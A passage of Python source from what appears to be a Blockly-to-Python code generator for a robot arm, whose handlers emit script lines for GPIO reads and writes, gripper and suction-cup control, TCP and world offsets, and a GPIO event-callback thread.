fields = self.get_nodes('field', block)
msg = json.dumps(fields[1].text, ensure_ascii=False)
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}print({})'.format(prefix, msg))
# msg = fields[1].text
# self._append_to_file('{}print(\'{}\')'.format(prefix, msg))
def _handle_tool_console_with_variable(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', block)
msg = fields[1].text
# msg = json.dumps(fields[1].text, ensure_ascii=False)
value = self.get_node('value', block)
expression = self.__get_condition_expression(value, arg_map=arg_map)
# self._append_to_file('{}value = {}'.format(prefix, expression))
prefix = self.__check_is_quit(prefix)
if msg:
self._append_to_file('{}print({}.format({}))'.format(prefix, json.dumps(msg+'{}', ensure_ascii=False), expression))
# self._append_to_file('{}pprint(\'{}{{}}\'.format({}))'.format(prefix, msg, expression))
else:
self._append_to_file('{}print(\'{{}}\'.format({}))'.format(prefix, expression))
def _handle_wait(self, block, prefix='', arg_map=None):
value = self.get_node('value', root=block)
value = self.get_nodes('field', root=value, descendant=True)[0].text
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} time.sleep({})'.format(prefix, value))
def _handle_gpio_get_digital(self, block, prefix='', arg_map=None):
io = self.get_node('field', block).text
if self._show_comment:
self._append_to_file('{}# get tgpio-{} digital'.format(prefix, io))
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.get_tgpio_digital({})'.format(prefix, io))
def _handle_gpio_get_analog(self, block, prefix='', arg_map=None):
io = self.get_node('field', block).text
if self._show_comment:
self._append_to_file('{}# get tgpio-{} analog'.format(prefix, io))
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.get_tgpio_analog({})'.format(prefix, io))
def _handle_gpio_set_digital(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
io = fields[0].text
value = 0 if fields[1].text == 'LOW' else 1
delay_sec = fields[2].text if len(fields) > 2 else 0
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set tgpio-{} digital'.format(prefix, io))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_tgpio_digital({}, {}, delay_sec={})'.format(prefix, io, value, delay_sec))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_tgpio_digital, code={{}}\'.format(code))'.format(prefix))
def _handle_gpio_set_digital_with_xyz(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
x = fields[0].text
y = fields[1].text
z = fields[2].text
xyz = list(map(float, [x, y, z]))
tol_r = fields[3].text
io = fields[4].text
value = 0 if fields[5].text == 'LOW' else 1
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set tgpio-{} digital with pos {}'.format(prefix, io, xyz))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_tgpio_digital_with_xyz({}, {}, {}, {})'.format(prefix, io, value, xyz, tol_r))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_tgpio_digital_with_xyz, code={{}}\'.format(code))'.format(prefix))
def _handle_get_suction_cup(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# get suction cup status'.format(prefix))
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.get_suction_cup()'.format(prefix))
def _handle_check_air_pump_state(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# check air pump state'.format(prefix))
fields = self.get_nodes('field', root=block)
state = 1 if fields[0].text == 'ON' else 0
timeout = float(fields[1].text)
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.arm.check_air_pump_state({}, timeout={})'.format(prefix, state, timeout))
def _handle_check_bio_gripper_is_catch(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# check bio gripper is catch'.format(prefix))
fields = self.get_nodes('field', root=block)
timeout = float(fields[0].text)
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.arm.check_bio_gripper_is_catch(timeout={})'.format(prefix, timeout))
def _handle_check_robotiq_is_catch(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# check robotiq is catch'.format(prefix))
fields = self.get_nodes('field', root=block)
timeout = float(fields[0].text)
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.arm.check_robotiq_is_catch(timeout={})'.format(prefix, timeout))
def _handle_set_suction_cup(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block, name='trigger')
on = True if fields[0].text == 'ON' else False
fields = self.get_nodes('field', root=block, name='wait')
if fields and len(fields) > 0:
wait = fields[0].text == 'TRUE'
else:
wait = False
fields = self.get_nodes('field', root=block, name='delay')
delay_sec = fields[0].text if len(fields) > 0 else 0
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set_suction_cup({}, wait={}, delay_sec={})'.format(prefix, on, wait, delay_sec))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_suction_cup({}, wait={}, delay_sec={})'.format(prefix, on, wait, delay_sec))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_suction_cup, code={{}}\'.format(code))'.format(prefix))
def _handle_gpio_get_controller_digital(self, block, prefix='', arg_map=None):
io = self.get_node('field', block).text
if self._show_comment:
self._append_to_file('{}# get cgpio-{} digital'.format(prefix, io))
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.get_cgpio_digital({})'.format(prefix, io))
def _handle_gpio_get_controller_digital_di(self, block, prefix='', arg_map=None):
io = self.get_node('field', block).text
if self._show_comment:
self._append_to_file('{}# get cgpio-{} digital'.format(prefix, io))
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.get_cgpio_digital({})'.format(prefix, io))
def _handle_gpio_get_controller_analog(self, block, prefix='', arg_map=None):
io = self.get_node('field', block).text
if self._show_comment:
self._append_to_file('{}# get cgpio-{} analog'.format(prefix, io))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.get_cgpio_analog({})'.format(prefix, io))
def _handle_gpio_set_controller_digital(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
io = fields[0].text
value = 0 if fields[1].text == 'LOW' else 1
delay_sec = fields[2].text if len(fields) > 2 else 0
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set cgpio-{} digital'.format(prefix, io))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_cgpio_digital({}, {}, delay_sec={})'.format(prefix, io, value, delay_sec))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_cgpio_digital, code={{}}\'.format(code))'.format(prefix))
def _handle_gpio_set_controller_digital_with_xyz(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
x = fields[0].text
y = fields[1].text
z = fields[2].text
xyz = list(map(float, [x, y, z]))
tol_r = fields[3].text
io = fields[4].text
value = 0 if fields[5].text == 'LOW' else 1
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set cgpio-{} digital with pos {}'.format(prefix, io, xyz))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_cgpio_digital_with_xyz({}, {}, {}, {})'.format(prefix, io, value, xyz, tol_r))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_cgpio_digital_with_xyz, code={{}}\'.format(code))'.format(prefix))
def _handle_gpio_set_controller_digital_do(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
io = fields[0].text
value = 0 if fields[1].text == 'LOW' else 1
delay_sec = fields[2].text if len(fields) > 2 else 0
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set cgpio-{} digital'.format(prefix, io))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_cgpio_digital({}, {}, delay_sec={})'.format(prefix, io, value, delay_sec))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_cgpio_digital, code={{}}\'.format(code))'.format(prefix))
def _handle_gpio_set_controller_digital_with_xyz_do(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
x = fields[0].text
y = fields[1].text
z = fields[2].text
xyz = list(map(float, [x, y, z]))
tol_r = fields[3].text
io = fields[4].text
value = 0 if fields[5].text == 'LOW' else 1
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set cgpio-{} digital with pos {}'.format(prefix, io, xyz))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_cgpio_digital_with_xyz({}, {}, {}, {})'.format(prefix, io, value, xyz, tol_r))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_cgpio_digital_with_xyz, code={{}}\'.format(code))'.format(prefix))
def _handle_gpio_set_controller_analog_with_xyz(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
x = fields[0].text
y = fields[1].text
z = fields[2].text
xyz = list(map(float, [x, y, z]))
tol_r = fields[3].text
io = fields[4].text
value = fields[5].text
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set cgpio-{} analog with pos {}'.format(prefix, io, xyz))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_cgpio_analog_with_xyz({}, {}, {}, {})'.format(prefix, io, value, xyz, tol_r))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_cgpio_analog_with_xyz, code={{}}\'.format(code))'.format(prefix))
def _handle_gpio_set_controller_analog(self, block, prefix='', arg_map=None):
io = self.get_node('field', block).text
value = self.get_node('value', root=block)
value = self.__get_block_val(value, arg_map=arg_map)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set cgpio-{} digital'.format(prefix, io))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_cgpio_analog({}, {})'.format(prefix, io, value))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_cgpio_analog, code={{}}\'.format(code))'.format(prefix))
def _handle_set_collision_sensitivity(self, block, prefix='', arg_map=None):
value = self.get_node('value', root=block)
value = self.get_nodes('field', root=value, descendant=True)[0].text
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.set_collision_sensitivity({})'.format(prefix, value))
def _handle_set_teach_sensitivity(self, block, prefix=''):
value = self.get_node('value', root=block)
value = self.get_nodes('field', root=value, descendant=True)[0].text
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.set_teach_sensitivity({})'.format(prefix, value))
def _handle_set_tcp_load(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
weight = fields[1].text
x = fields[2].text
y = fields[3].text
z = fields[4].text
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.set_tcp_load({}, [{}, {}, {}])'.format(prefix, weight, x, y, z))
# self._append_to_file('{} arm.set_state(0)'.format(prefix))
# self._append_to_file('{} time.sleep(0.5)'.format(prefix))
# values = self.get_nodes('value', root=block)
# weight = self.get_nodes('field', root=values[0], descendant=True)[0].text
# x = self.get_nodes('field', root=values[1], descendant=True)[0].text
# y = self.get_nodes('field', root=values[2], descendant=True)[0].text
# z = self.get_nodes('field', root=values[3], descendant=True)[0].text
# self._append_to_file('{}arm.set_tcp_load({}, [{}, {}, {}])'.format(prefix, weight, x, y, z))
# self._append_to_file('{}arm.set_state(0)'.format(prefix))
def _handle_set_gravity_direction(self, block, prefix='', arg_map=None):
values = self.get_nodes('value', root=block)
x = self.get_nodes('field', root=values[0], descendant=True)[0].text
y = self.get_nodes('field', root=values[1], descendant=True)[0].text
z = self.get_nodes('field', root=values[2], descendant=True)[0].text
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.set_gravity_direction([{}, {}, {}])'.format(prefix, x, y, z))
def _handle_set_tcp_offset(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
x = fields[1].text
y = fields[2].text
z = fields[3].text
roll = fields[4].text
pitch = fields[5].text
yaw = fields[6].text
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.set_tcp_offset([{}, {}, {}, {}, {}, {}], wait=True)'.format(prefix, x, y, z, roll, pitch, yaw))
self._append_to_file('{} arm.set_state(0)'.format(prefix))
self._append_to_file('{} time.sleep(0.5)'.format(prefix))
# values = self.get_nodes('value', root=block)
# x = self.get_nodes('field', root=values[0], descendant=True)[0].text
# y = self.get_nodes('field', root=values[1], descendant=True)[0].text
# z = self.get_nodes('field', root=values[2], descendant=True)[0].text
# roll = self.get_nodes('field', root=values[3], descendant=True)[0].text
# pitch = self.get_nodes('field', root=values[4], descendant=True)[0].text
# yaw = self.get_nodes('field', root=values[5], descendant=True)[0].text
# self._append_to_file('{}arm.set_tcp_offset([{}, {}, {}, {}, {}, {}])'.format(prefix, x, y, z, roll, pitch, yaw))
# self._append_to_file('{}arm.set_state(0)'.format(prefix))
def _handle_set_world_offset(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
x = fields[1].text
y = fields[2].text
z = fields[3].text
roll = fields[4].text
pitch = fields[5].text
yaw = fields[6].text
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.set_world_offset([{}, {}, {}, {}, {}, {}])'.format(prefix, x, y, z, roll, pitch, yaw))
self._append_to_file('{} arm.set_state(0)'.format(prefix))
self._append_to_file('{} time.sleep(0.5)'.format(prefix))
def _handle_gripper_set(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
if fields is not None and len(fields) >= 3:
pos = fields[0].text
speed = fields[1].text
wait = fields[2].text == 'TRUE'
else:
values = self.get_nodes('value', root=block)
pos = self.get_nodes('field', root=values[0], descendant=True)[0].text
speed = self.get_nodes('field', root=values[1], descendant=True)[0].text
wait = self.get_nodes('field', root=values[2], descendant=True)[0].text == 'TRUE'
if self._show_comment:
self._append_to_file('{}# set gripper position and {}'.format(prefix, 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_gripper_position({}, wait={}, speed={}, auto_enable=True)'.format(prefix, pos, wait, speed))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_gripper_position, code={{}}\'.format(code))'.format(prefix))
def _handle_gripper_set_status(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block, name='status')
status = True if fields[0].text == 'TRUE' else False
fields = self.get_nodes('field', root=block, name='delay')
delay_sec = fields[0].text if len(fields) > 0 else 0
if self._show_comment:
self._append_to_file('{}# set_gripper_status({}, delay_sec={})'.format(prefix, status, delay_sec))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm._arm.set_gripper_status({}, delay_sec={})'.format(prefix, status, delay_sec))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_gripper_status, code={{}}\'.format(code))'.format(prefix))
def _handle_set_bio_gripper_init(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# set_bio_gripper_enable(True)'.format(prefix))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_bio_gripper_enable(True)'.format(prefix))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_bio_gripper_enable, code={{}}\'.format(code))'.format(prefix))
# self._append_to_file('{}expired = time.time() + 2'.format(prefix))
# self._append_to_file('{}while not params[\'quit\'] and time.time() < expired:'.format(prefix))
# self._append_to_file('{} time.sleep(0.1)'.format(prefix))
def _handle_set_bio_gripper(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block, name='status')
on = True if fields[0].text == 'TRUE' else False
fields = self.get_nodes('field', root=block, name='speed')
speed = int(fields[0].text) if fields and len(fields) > 0 else 0
fields = self.get_nodes('field', root=block, name='wait')
wait = fields[0].text == 'TRUE' if fields and len(fields) > 0 else False
if on:
if self._show_comment:
self._append_to_file('{}# open_bio_gripper(speed={}, wait={})'.format(prefix, speed, wait))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.open_bio_gripper(speed={}, wait={})'.format(prefix, speed, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'open_bio_gripper, code={{}}\'.format(code))'.format(prefix))
else:
if self._show_comment:
self._append_to_file('{}# close_bio_gripper(speed={}, wait={})'.format(prefix, speed, wait))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.close_bio_gripper(speed={}, wait={})'.format(prefix, speed, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'close_bio_gripper, code={{}}\'.format(code))'.format(prefix))
def _handle_set_robotiq_init(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# set_robotiq_init()'.format(prefix))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code, _ = arm.robotiq_reset()'.format(prefix))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'robotiq_reset, code={{}}\'.format(code))'.format(prefix))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code, _ = arm.robotiq_set_activate(wait=True)'.format(prefix))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'robotiq_set_activate, code={{}}\'.format(code))'.format(prefix))
def _handle_set_robotiq_gripper(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block, name='pos')
pos = int(fields[0].text)
fields = self.get_nodes('field', root=block, name='speed')
speed = int(fields[0].text) if fields and len(fields) > 0 else 0xFF
fields = self.get_nodes('field', root=block, name='force')
force = int(fields[0].text) if fields and len(fields) > 0 else 0xFF
fields = self.get_nodes('field', root=block, name='wait')
wait = fields[0].text == 'TRUE' if fields and len(fields) > 0 else False
if self._show_comment:
self._append_to_file('{}# robotiq_set_position({}, speed={}, force={}, wait={})'.format(prefix, pos, speed, force, wait))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code, _ = arm.robotiq_set_position({}, speed={}, force={}, wait={})'.format(prefix, pos, speed, force, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'robotiq_set_position, code={{}}\'.format(code))'.format(prefix))
def __handle_gpio_event(self, gpio_type, block, prefix='', arg_map=None):
if gpio_type.startswith('listen'):
if gpio_type == 'listen_tgpio_digital':
self._append_to_file('\n{}params[\'events\'][\'gpio\'].listen_tgpio_digital = True'.format(prefix))
elif gpio_type == 'listen_tgpio_analog':
self._append_to_file('\n{}params[\'events\'][\'gpio\'].listen_tgpio_analog = True'.format(prefix))
elif gpio_type == 'listen_cgpio_state':
self._append_to_file('\n{}params[\'events\'][\'gpio\'].listen_cgpio_state = True'.format(prefix))
else:
return
old_prefix = prefix
else:
fields = self.get_nodes('field', root=block)
io = fields[0].text
trigger = fields[1].text
if 'gpio' not in self._events:
num = 1
else:
if gpio_type not in self._events['gpio']:
num = 1
else:
num = self._events['gpio'][gpio_type] + 1
if gpio_type == 'tgpio_digital':
name = 'tool_gpio_{}_digital_is_changed_callback_{}'.format(io, num)
self._append_to_file('\n\n{}# Define Tool GPIO-{} DIGITAL is changed callback'.format(prefix, io))
elif gpio_type == 'tgpio_analog':
name = 'tool_gpio_{}_analog_is_changed_callback_{}'.format(io, num)
self._append_to_file('\n\n{}# Define Tool GPIO-{} ANALOG is changed callback'.format(prefix, io))
elif gpio_type == 'cgpio_digital':
name = 'controller_gpio_{}_digital_is_changed_callback_{}'.format(io, num)
self._append_to_file('\n\n{}# Define Contoller GPIO-{} DIGITAL is {} callback'.format(prefix, io, trigger))
elif gpio_type == 'cgpio_analog':
name = 'controller_gpio_{}_digital_is_changed_callback_{}'.format(io, num)
self._append_to_file('\n\n{}# Define Contoller GPIO-{} ANALOG is changed callback'.format(prefix, io))
else:
return
self._append_to_file('{}def {}():'.format(prefix, name))
old_prefix = prefix
prefix = ' ' + prefix
statement = self.get_node('statement', root=block)
if statement:
self._append_to_file('{}def _callback():'.format(prefix))
self.parse(statement, prefix + ' ', arg_map=arg_map)
self._append_to_file('{}_callback() if not params[\'callback_in_thread\'] else threading.Thread(target=_callback, daemon=True).start()'.format(prefix))
else:
self._append_to_file('{}pass'.format(prefix))
if gpio_type == 'tgpio_digital':
self._append_to_file(
'\n{}params[\'events\'][\'gpio\'].tgpio_digital_callbacks.append({{'
'\'io\': {}, \'trigger\': {}, \'op\': \'==\', \'callback\': {}}})'.format(
old_prefix, io, 1 if trigger == 'HIGH' else 0, name))
elif gpio_type == 'tgpio_analog':
op = self._ops2.get(trigger)
trigger = fields[2].text
self._append_to_file(
'\n{}params[\'events\'][\'gpio\'].tgpio_analog_callbacks.append({{'
'\'io\': {}, \'trigger\': {}, \'op\': \'{}\', \'callback\': {}}})'.format(
old_prefix, io, trigger, op, name))
elif gpio_type == 'cgpio_digital':
self._append_to_file(
'\n{}params[\'events\'][\'gpio\'].cgpio_callbacks.append({{'
'\'type\': \'digital\', \'io\': {}, \'trigger\': {}, \'op\': \'{}\', \'callback\': {}}})'.format(
old_prefix, io, 1 if trigger == 'HIGH' else 0, '==', name))
elif gpio_type == 'cgpio_analog':
op = self._ops2.get(trigger)
trigger = fields[2].text
self._append_to_file(
'\n{}params[\'events\'][\'gpio\'].cgpio_callbacks.append({{'
'\'type\': \'analog\', \'io\': {}, \'trigger\': {}, \'op\': \'{}\', \'callback\': {}}})'.format(
old_prefix, io, trigger, op, name))
else:
return
self._append_to_file('{}if not params[\'events\'][\'gpio\'].alive:'.format(old_prefix))
self._append_to_file('{} params[\'events\'][\'gpio\'].start()'.format(old_prefix))
if 'gpio' not in self._events:
name2 = 'EventGPIOThread'
self._insert_to_file(self.index, '\n\n# Define GPIO callback handle thread')
self._insert_to_file(self.index, 'class {}(threading.Thread):'.format(name2))
self._insert_to_file(self.index, ' def __init__(self, *args, **kwargs):'
'\n threading.Thread.__init__(self, *args, **kwargs)')
self._insert_to_file(self.index, ' self.daemon = True')
self._insert_to_file(self.index, ' self.alive = False')
self._insert_to_file(self.index, ' self.is_init_tgpio_digital = False')
self._insert_to_file(self.index, ' self.is_init_tgpio_analog = False')
self._insert_to_file(self.index, ' self.is_init_cgpio_state = False')
self._insert_to_file(self.index, ' self.listen_tgpio_digital = False')
self._insert_to_file(self.index, ' self.listen_tgpio_analog = False')
self._insert_to_file(self.index, ' self.listen_cgpio_state = False')
self._insert_to_file(self.index, ' self.values = {'
'\'tgpio\': {\'digital\': [0] * 2, \'analog\': [0] * 2, \'digital_o\': [0] * 2, \'analog_o\': [0] * 2},'
'\'cgpio\': {\'digital\': [1] * 16, \'analog\': [0] * 2, \'digital_o\': [1] * 16, \'analog_o\': [0] * 2}}')
self._insert_to_file(self.index, ' self.tgpio_digital_callbacks = []')
self._insert_to_file(self.index, ' self.tgpio_analog_callbacks = []')
self._insert_to_file(self.index, ' self.cgpio_callbacks = []')
self._insert_to_file(self.index, '\n def cgpio_digitals_is_matchs_bin(self, bin_val):')
self._insert_to_file(self.index, ' digitals_bin = \'\'.join(map(str, self.values[\'cgpio\'][\'digital\']))')
self._insert_to_file(self.index, ' length = min(len(digitals_bin), len(bin_val))')
self._insert_to_file(self.index, ' bin_val_ = bin_val[::-1]')
self._insert_to_file(self.index, ' for i in range(length):')
self._insert_to_file(self.index, ' if bin_val_[i] != digitals_bin[i]:')
self._insert_to_file(self.index, ' return False')
self._insert_to_file(self.index, ' return True')
self._insert_to_file(self.index, '\n def run(self):')
self._insert_to_file(self.index, ' self.alive = True')
self._insert_to_file(self.index, ' while arm.connected and arm.error_code == 0 and not params[\'quit\']:')
self._insert_to_file(self.index, ' if self.listen_tgpio_digital or len(self.tgpio_digital_callbacks) > 0:')
self._insert_to_file(self.index, ' _, values = arm.get_tgpio_digital()')
self._insert_to_file(self.index, ' if _ == 0:')
self._insert_to_file(self.index, ' if self.is_init_tgpio_digital:')
self._insert_to_file(self.index, ' for item in self.tgpio_digital_callbacks:')
self._insert_to_file(self.index, ' for io in range(2):')
self._insert_to_file(self.index, ' if item[\'io\'] == io and eval(\'{} {} {}\'.format(values[io], item[\'op\'], item[\'trigger\'])) and not eval(\'{} {} {}\'.format(self.values[\'tgpio\'][\'digital\'][io], item[\'op\'], item[\'trigger\'])):')
# self._insert_to_file(self.index, ' if item[\'io\'] == io and values[io] {op} item[\'trigger\'] and not (values[io] {op} self.values[\'tgpio\'][\'digital\'][io]):'.format(op='item[\'op\']'))
self._insert_to_file(self.index, ' item[\'callback\']()')
self._insert_to_file(self.index, ' self.values[\'tgpio\'][\'digital\'] = values')
self._insert_to_file(self.index, ' self.is_init_tgpio_digital = True')
self._insert_to_file(self.index, ' if self.listen_tgpio_analog or len(self.tgpio_analog_callbacks) > 0:')
self._insert_to_file(self.index, ' _, values = arm.get_tgpio_analog()')
self._insert_to_file(self.index, ' if _ == 0:')
self._insert_to_file(self.index, ' if self.is_init_tgpio_analog:')
self._insert_to_file(self.index, ' for item in self.tgpio_analog_callbacks:')
self._insert_to_file(self.index, ' for io in range(2):')
self._insert_to_file(self.index, ' if item[\'io\'] == io and eval(\'{} {} {}\'.format(values[io], item[\'op\'], item[\'trigger\'])) and not eval(\'{} {} {}\'.format(self.values[\'tgpio\'][\'analog\'][io], item[\'op\'], item[\'trigger\'])):')
# self._insert_to_file(self.index, ' if item[\'io\'] == io and values[io] {op} item[\'trigger\'] and not (values[io] {op} self.values[\'tgpio\'][\'analog\'][io]):'.format(op='item[\'op\']'))
self._insert_to_file(self.index, ' item[\'callback\']()')
self._insert_to_file(self.index, ' self.values[\'tgpio\'][\'analog\'] = values')
self._insert_to_file(self.index, ' self.is_init_tgpio_analog = True')
self._insert_to_file(self.index, ' if self.listen_cgpio_state or len(self.cgpio_callbacks) > 0:')
self._insert_to_file(self.index, ' _, values = arm.get_cgpio_state()')
self._insert_to_file(self.index, ' if _ == 0:')
self._insert_to_file(self.index, ' digitals = [values[3] >> i & 0x0001 if values[10][i] in [0, 255] else 1 for i in range(len(values[10]))]')
self._insert_to_file(self.index, ' digitals_o = [values[5] >> i & 0x0001 for i in range(len(values[11]))]')
self._insert_to_file(self.index, ' analogs = [values[6], values[7]]')
self._insert_to_file(self.index, ' analogs_o = [values[8], values[9]]')
self._insert_to_file(self.index, ' if self.is_init_cgpio_state:')
self._insert_to_file(self.index, ' for item in self.cgpio_callbacks:')
self._insert_to_file(self.index, ' if item[\'type\'] == \'digital\':')
self._insert_to_file(self.index, ' for io in range(len(digitals)):')
self._insert_to_file(self.index, ' if item[\'io\'] == io and eval(\'{} {} {}\'.format(digitals[io], item[\'op\'], item[\'trigger\'])) and not eval(\'{} {} {}\'.format(self.values[\'cgpio\'][\'digital\'][io], item[\'op\'], item[\'trigger\'])):')
# self._insert_to_file(self.index, ' if item[\'io\'] == io and values[io] {op} item[\'trigger\'] and not (values[io] {op} self.values[\'cgpio\'][\'digital\'][io]):'.format(op='item[\'op\']'))
self._insert_to_file(self.index, ' item[\'callback\']()')
self._insert_to_file(self.index, ' elif item[\'type\'] == \'analog\':')
self._insert_to_file(self.index, ' for io in range(2):')
